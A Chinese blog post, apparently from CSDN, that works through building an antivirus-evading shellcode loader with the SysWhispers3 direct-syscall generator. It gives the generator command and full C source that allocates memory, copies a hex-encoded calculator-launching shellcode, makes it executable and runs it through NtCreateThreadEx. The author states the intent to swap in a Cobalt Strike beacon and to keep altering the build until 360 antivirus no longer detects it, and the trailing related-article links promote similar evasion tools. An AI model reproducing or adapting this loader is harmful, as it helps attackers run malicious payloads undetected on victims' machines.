syscall函数(调用底层,非windowsAPI)去执行shellcode

已于 2023-08-30 00:59:09 修改
阅读量423 收藏
点赞数
分类专栏: 免杀 文章标签: windows c++ 网络安全
于 2023-08-30 00:58:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132573713
版权

首先使用github提供的项目https://github.com/klezVirus/SysWhispers3
利用该工具去执行命令

python3 syswhispers.py --functions NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscalls_mem --arch x64 --wow64

然后会产生三个文件
在这里插入图片描述
然后我们将它放到vs studio中,如下:
在这里插入图片描述
我们分开来看
ConsoleApplication3.c:(该payload是弹出计算器,还需要后续去改成上线cs)

#define _CRT_SECURE_NO_WARNINGS 1
#include "syscalls_mem.h"
#include <Windows.h>
#include<stdio.h>

unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
unsigned int calc_len = 276;

int main()
{
    DWORD oldprotect = 0;
    HANDLE hProc = GetCurrentProcess();
    LPVOID base_addr = NULL;
    HANDLE thandle = NULL;

    NTSTATUS NTAVM = NtAllocateVirtualMemory(
        hProc,
        &base_addr,
        0,
        (PSIZE_T)&calc_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);
    RtlMoveMemory(base_addr, calc_payload, calc_len);
    NTSTATUS NTPVM = NtProtectVirtualMemory(
        hProc,
        &base_addr,
        (PSIZE_T)&calc_len,
        PAGE_EXECUTE_READ,
        &oldprotect);

    NTSTATUS ct = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, FALSE, 0, 0, 0, NULL);
    if (ct == 0)
    {
        printf("[*] -- shellcode start succesful!");
        free(base_addr);
        return 0;
    }
    printf("[*] -- shellcode start error!");
    free(base_addr);
    return 1;
}

因为这个文件要生成,所以不需要做下面的改动
在这里插入图片描述
其他三个都是自动生成的,位置放好相应路径即可
因为syscalls_mem.c是需要去编译的,所以我们也默认它的属性值,和ConsoleApplication3.c一样:
在这里插入图片描述
syscalls_mem.h也是需要编译的,也是默认的
在这里插入图片描述
只有.asm是不需要生成的,修改如下:
在这里插入图片描述
同时需要项目导入masm依赖
在这里插入图片描述
然后编译即可
在这里插入图片描述
运行看看效果:
在这里插入图片描述
可以看到成功弹出计算器

然后我放到360杀毒中,会报毒
应该是检测到了syscall
因为syscall特征非常明显,静态特征就很容易被识别到
在这里插入图片描述
那么之后再次特征上修改

番茄酱料
关注
专栏目录
w32syscall:额外的 w32 系统调用函数去系统调用
06-15
`w32syscall`是一个专门针对Windows 32位环境的系统调用接口,它提供了额外的函数来允许开发者直接访问底层的系统服务。这篇文章将深入探讨`w32syscall`的相关知识点,以及如何在Go语言中利用这些功能。 1. **系统...
【Linux】syscall系统调用原理及实现
热门推荐
楠燊.tech
02-22 1万+
linux syscall系统调用
3分钟了解syscall系统调用|详细易懂的流程
weixin_43356770的博客
01-04 4312
系统调用syscall)是操作系统提供给程序以请求内核服务的一种机制。和int 0x80提供相同的服务。系统调用是操作系统提供给应用程序的一种重要接口,它使得程序能够安全、有效地执行需要操作系统干预的操作,如文件处理、进程管理等。尽管系统调用引入了一定的性能开销,但它的安全性和易用性使得它成为操作系统设计中不可或缺的一部分。SYSCALL减少了上下文切换和简化了指令执行流程,性能更高,但对旧机器的兼容性不如int 80h.
推荐项目:SysWhispers3 —— 打破常规的系统调用黑科技
最新发布
gitblog_01090的博客
08-19 743
推荐项目:SysWhispers3 —— 打破常规的系统调用黑科技 SysWhispers3SysWhispers on Steroids - AV/EDR evasion via direct system calls. 项目地址:https://gitcode.com/gh_mirrors/sy/SysWhispers3 在当今的安全研究领域,规避高级安全防护机制已成为红队操作和逆向工程中不...
syscall是什么
斯坦福-MIT-Harvard-CMU
11-06 1023
系统调用Syscall)是操作系统提供给应用程序的编程接口,允许应用程序与操作系统内核进行交互,以访问操作系统提供的服务和资源。系统调用是操作系统内核的一部分,通过系统调用,应用程序可以执行一些特权操作,例如文件访问、进程管理、网络通信等。在RISC-V体系结构中,系统调用通常以ecall指令的形式出现,作为从用户态进入内核态的一种方式。ecall指令用于触发异常,操作系统内核会在异常处理程序中执行相应的系统调用服务。
系统调用syscall函数和字符设备驱动file_operations
xcxhzjl的博客
01-06 1725
Linux系统调用syscall函数
最新免杀!可过360核晶与Defender(SysWhispers3
潇湘信安的博客
05-19 1633
SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能,目前还可免杀绕过360核晶与Defender。
my_syscall.zip_my_syscall_syscall_内核模块_系统调用
09-21
在Linux操作系统中,系统调用是用户空间与内核空间交互的重要途径,它允许应用程序请求操作系统执行特定的服务,如创建进程、读写文件、管理网络等。本项目名为"my_syscall.zip_my_syscall_syscall_内核模块_系统...
SyscallTables:Windows NT x64 Syscall表
04-29
Syscall表组合的Windows x64 syscall表Ntoskrnl服务表Windows 2003 SP2 build 3790和Windows XP 64; Windows Vista RTM版本6000; Windows Vista SP2内部版本6002; Windows 7 SP1内部版本7601; Windows 8 RTM版本...
SyscallPOC:使用syscall的Shellcode注入POC
03-09
使用syscall的概念shellcode注入器的简单证明。 当前适用于Windows 10 1909和2004,默认值为1909。 您需要在Syscalls.cs取消注释2004年的syscall,并注释掉1909年的syscall才能切换到2004年。 该POC的灵感来自Jack...
go语言执行windows下命令行的方法
09-22
在`main`函数中,创建了`***mand`对象`c`,第一个参数是`"cmd"`,表示调用Windows命令行程序,第二个参数是`"/C"`,表示执行完命令后关闭命令行窗口,第三个参数`"del"`是命令行中用来删除文件的命令,最后是需要...
SysWhispers:通过直接系统调用规避AVEDR
05-30
系统私语 SysWhispers 通过生成植入程序可以用来进行直接系统调用的头文件/ASM 文件来帮助规避。 从Windows XP到Windows 10 19042(20H2),都支持所有核心syscall。 在example-output/文件夹中可用的示例生成文件。 介绍 各种安全产品在用户模式 ​​API 中放置钩子,允许它们将执行流重定向到它们的引擎并检测可疑行为。 ntdll.dll中生成系统调用函数仅包含一些汇编指令,因此在您自己的植入物中重新实现它们可以绕过这些安全产品挂钩的触发。 该技术由推广,他的有更多值得阅读的技术细节。 SysWhispers 为红队人员提供了为核心内核映像 ( ntoskrnl.exe ) 中的任何系统调用生成标头/ASM 对的能力,该功能适用​​于从 XP 开始的任何 Windows 版本。 标头还将包括必要的类型定义。 这与 POC 之
Linux 系统调用原理
zhangna的博客
06-20 1457
了系统调用原理,或许能帮你找到进入kernel函数的入口。一、Syscall意义内核提供用户空间程序与内核空间进行交互的一套标准接口,这些接口让用户态程序能受限访问硬件设备,比如申请系统资源,操作设备读写,创建新进程等。用户空间发生请求,内核空间负责执行,这些接口便是用户空间和内核空间共同识别的桥梁,这里提到两个字“受限”,是由于为了保证内核稳定性,而不能让用户空间程序随意更改系统,必须是内核对外...
探索SysWhispers3:深入系统调用的秘密武器
gitblog_00088的博客
04-25 481
探索SysWhispers3:深入系统调用的秘密武器 SysWhispers3SysWhispers on Steroids - AV/EDR evasion via direct system calls. 项目地址:https://gitcode.com/gh_mirrors/sy/SysWhispers3 是一个开源项目,它专注于提供一种低噪音、高隐蔽性的系统调用接口利用技术。该项目的主要...
gd32f303 设计中断优先级_操作系统 | 中断 & 系统调用浅析
weixin_39778668的博客
11-21 565
前言在分析 Android 源码的过程中,往往会经历 app -> framework -> native -> kernel 的过程,最终就来到了用户程序与内核层序的边界,即:系统调用System Call);清晰地理解系统调用的相关概念,对于后续深刻理解其他重点知识大有裨益。在这篇文章里,我将简单分析 中断 &系统调用 的相关概念,如果能帮上忙,请务必点赞加关注,这...
syscall()
m0_51551385的博客
06-03 3879
syscall函数
SysWhispers3WinHttp免杀----ConsoleApplication814项目
bring_coco的博客
08-28 266
使用项目:https://github.com/huaigu4ng/SysWhispers3WinHttp。过不了windows defender,放上去直接杀,更别说运行了,没办法用此项目的人太多了。通过cs生成beacon.bin,放到vps,开启http服务。在原项目上改改吧,改改还是很牛逼的。360安全卫士和360杀毒可以过。注意用gcc编译,vs编译报错。
尚硅谷2020最新版宋红康JVM教程-中篇-第2章Class文件结构-1-概述
admin741admin的博客
09-28 379
引言 Java字节码对于虚拟机,就好像汇编语言对于计算机,属于基本执行指令。 Java虚拟机的指令由一个字节长度的、代表着某种特定操作含义的数字(称为操作码,Opcode)以及跟随其后的零至多个代表此操作所需参数(称为操作数,Operands)而构成。由于Java虚拟机采用面向操作数栈而不是寄存器的结构,所以大多数的指令都不包含操作数,只有一个操作码。 由于限制了Java虚拟机操作码的长度为一个字节(即0~255),这意味着指令集的操作码总数不可能超过256条。 官方文档:https://docs.ora
Windows内核--裸调系统调用(4.1)
编程语言技巧经验分享
11-12 1080
ntdll.dll NtCreateProcess将服务号0x82传入,通过syscall调入内核系统调用例程。syscall在做什么?在64位系统上,Windows使用syscall指令实现系统服务分发。syscall实现和int 2E类似的作用,只不过它更快速,看它名字"快速调用"。 本文将新增一个系统调用来加深对syscal的理解。
在freertos中,当执行syscall 0时,会执行什么函数
06-10
当任务执行syscall 0时,它会调用vTaskDelete函数来删除自身的任务控制块,并释放任务所占用的资源。vTaskDelete函数的实现位于FreeRTOS内核中,它的作用是删除任务控制块并释放任务所占用的资源,包括任务堆栈、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值